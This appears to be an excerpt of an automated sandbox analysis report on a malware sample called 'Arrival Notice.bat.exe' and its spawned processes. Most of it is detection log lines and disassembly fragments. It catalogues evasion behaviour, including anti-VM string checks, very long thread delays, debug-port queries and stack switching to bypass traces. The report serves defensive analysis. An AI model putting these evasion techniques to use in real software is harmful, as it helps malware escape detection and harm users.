              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\runonce.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: Arrival Notice.bat.exe PID: 6712, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: dLrZsz.exe PID: 7468, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: -6qxw.exe PID: 7772, type: MEMORYSTR
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\compact.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\runonce.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 1300000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 2F90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 8370000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 9370000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: 9540000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeMemory allocated: A540000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 48B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 78D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 88D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 8A90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeMemory allocated: 9A90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: A50000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: 2420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: 4420000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: 8670000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: 7FE0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeMemory allocated: 8670000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E rdtsc 8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeWindow / User API: threadDelayed 703Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeWindow / User API: threadDelayed 933Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2304Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4416Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeWindow / User API: threadDelayed 996Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeWindow / User API: threadDelayed 391Jump to behavior
              Source: C:\Windows\SysWOW64\compact.exeWindow / User API: threadDelayed 9832
              Source: C:\Windows\SysWOW64\runonce.exeWindow / User API: threadDelayed 9973
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeAPI coverage: 0.7 %
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeAPI coverage: 0.2 %
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe TID: 3624Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exe TID: 5480Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7460Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe TID: 7660Thread sleep time: -8301034833169293s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exe TID: 7652Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116Thread sleep count: 141 > 30
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116Thread sleep time: -282000s >= -30000s
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116Thread sleep count: 9832 > 30
              Source: C:\Windows\SysWOW64\compact.exe TID: 8116Thread sleep time: -19664000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144Thread sleep time: -90000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144Thread sleep time: -45000s >= -30000s
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144Thread sleep count: 45 > 30
              Source: C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe TID: 8144Thread sleep time: -45000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exe TID: 7808Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\runonce.exe TID: 1732Thread sleep count: 9973 > 30
              Source: C:\Windows\SysWOW64\runonce.exe TID: 1732Thread sleep time: -19946000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\runonce.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeThread delayed: delay time: 922337203685477
              Source: compact.exe, 00000012.00000002.4143560755.000000000263A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
              Source: Arrival Notice.bat.exe, 00000000.00000002.1706088300.00000000011A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: compact.exe, 00000012.00000002.4143560755.000000000255D000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000012.00000002.4150230985.0000000007820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4144211705.0000000001270000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
              Source: firefox.exe, 00000014.00000002.2340102234.00000260728BC000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4143575378.000000000099A000.00000004.00000020.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4144762086.0000000000B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 0000001C.00000002.3809126209.000001628853C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRRZ
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\dLrZsz.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\compact.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\-6qxw.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\runonce.exeProcess queried: DebugPort
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B096E rdtsc 8_2_015B096E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_00417933 LdrLoadDll,8_2_00417933
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C156 mov eax, dword ptr fs:[00000030h]8_2_0156C156
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644164 mov eax, dword ptr fs:[00000030h]8_2_01644164
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01644164 mov eax, dword ptr fs:[00000030h]8_2_01644164
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576154 mov eax, dword ptr fs:[00000030h]8_2_01576154
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01576154 mov eax, dword ptr fs:[00000030h]8_2_01576154
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01604144 mov eax, dword ptr fs:[00000030h]8_2_01604144
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01604144 mov eax, dword ptr fs:[00000030h]8_2_01604144
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01604144 mov ecx, dword ptr fs:[00000030h]8_2_01604144
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01604144 mov eax, dword ptr fs:[00000030h]8_2_01604144
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01604144 mov eax, dword ptr fs:[00000030h]8_2_01604144
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01608158 mov eax, dword ptr fs:[00000030h]8_2_01608158
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov ecx, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov ecx, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov ecx, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov eax, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161E10E mov ecx, dword ptr fs:[00000030h]8_2_0161E10E
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01630115 mov eax, dword ptr fs:[00000030h]8_2_01630115
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161A118 mov ecx, dword ptr fs:[00000030h]8_2_0161A118
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161A118 mov eax, dword ptr fs:[00000030h]8_2_0161A118
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161A118 mov eax, dword ptr fs:[00000030h]8_2_0161A118
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0161A118 mov eax, dword ptr fs:[00000030h]8_2_0161A118
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A0124 mov eax, dword ptr fs:[00000030h]8_2_015A0124
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016461E5 mov eax, dword ptr fs:[00000030h]8_2_016461E5
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE1D0 mov eax, dword ptr fs:[00000030h]8_2_015EE1D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE1D0 mov eax, dword ptr fs:[00000030h]8_2_015EE1D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE1D0 mov ecx, dword ptr fs:[00000030h]8_2_015EE1D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE1D0 mov eax, dword ptr fs:[00000030h]8_2_015EE1D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015EE1D0 mov eax, dword ptr fs:[00000030h]8_2_015EE1D0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016361C3 mov eax, dword ptr fs:[00000030h]8_2_016361C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016361C3 mov eax, dword ptr fs:[00000030h]8_2_016361C3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015A01F8 mov eax, dword ptr fs:[00000030h]8_2_015A01F8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F019F mov eax, dword ptr fs:[00000030h]8_2_015F019F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F019F mov eax, dword ptr fs:[00000030h]8_2_015F019F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F019F mov eax, dword ptr fs:[00000030h]8_2_015F019F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F019F mov eax, dword ptr fs:[00000030h]8_2_015F019F
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A197 mov eax, dword ptr fs:[00000030h]8_2_0156A197
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A197 mov eax, dword ptr fs:[00000030h]8_2_0156A197
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A197 mov eax, dword ptr fs:[00000030h]8_2_0156A197
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B0185 mov eax, dword ptr fs:[00000030h]8_2_015B0185
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614180 mov eax, dword ptr fs:[00000030h]8_2_01614180
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01614180 mov eax, dword ptr fs:[00000030h]8_2_01614180
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162C188 mov eax, dword ptr fs:[00000030h]8_2_0162C188
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0162C188 mov eax, dword ptr fs:[00000030h]8_2_0162C188
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01572050 mov eax, dword ptr fs:[00000030h]8_2_01572050
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F6050 mov eax, dword ptr fs:[00000030h]8_2_015F6050
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0159C073 mov eax, dword ptr fs:[00000030h]8_2_0159C073
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E016 mov eax, dword ptr fs:[00000030h]8_2_0158E016
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E016 mov eax, dword ptr fs:[00000030h]8_2_0158E016
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E016 mov eax, dword ptr fs:[00000030h]8_2_0158E016
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0158E016 mov eax, dword ptr fs:[00000030h]8_2_0158E016
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01606030 mov eax, dword ptr fs:[00000030h]8_2_01606030
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F4000 mov ecx, dword ptr fs:[00000030h]8_2_015F4000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_01612000 mov eax, dword ptr fs:[00000030h]8_2_01612000
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A020 mov eax, dword ptr fs:[00000030h]8_2_0156A020
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C020 mov eax, dword ptr fs:[00000030h]8_2_0156C020
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F20DE mov eax, dword ptr fs:[00000030h]8_2_015F20DE
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156C0F0 mov eax, dword ptr fs:[00000030h]8_2_0156C0F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015B20F0 mov ecx, dword ptr fs:[00000030h]8_2_015B20F0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0156A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0156A0E3
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015780E9 mov eax, dword ptr fs:[00000030h]8_2_015780E9
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F60E0 mov eax, dword ptr fs:[00000030h]8_2_015F60E0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016080A8 mov eax, dword ptr fs:[00000030h]8_2_016080A8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016360B8 mov eax, dword ptr fs:[00000030h]8_2_016360B8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_016360B8 mov ecx, dword ptr fs:[00000030h]8_2_016360B8
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_0157208A mov eax, dword ptr fs:[00000030h]8_2_0157208A
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015680A0 mov eax, dword ptr fs:[00000030h]8_2_015680A0
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov eax, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov eax, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov eax, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov ecx, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov eax, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F035C mov eax, dword ptr fs:[00000030h]8_2_015F035C
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
              Source: C:\Users\user\Desktop\Arrival Notice.bat.exeCode function: 8_2_015F2349 mov eax, dword ptr fs:[00000030h]8_2_015F2349
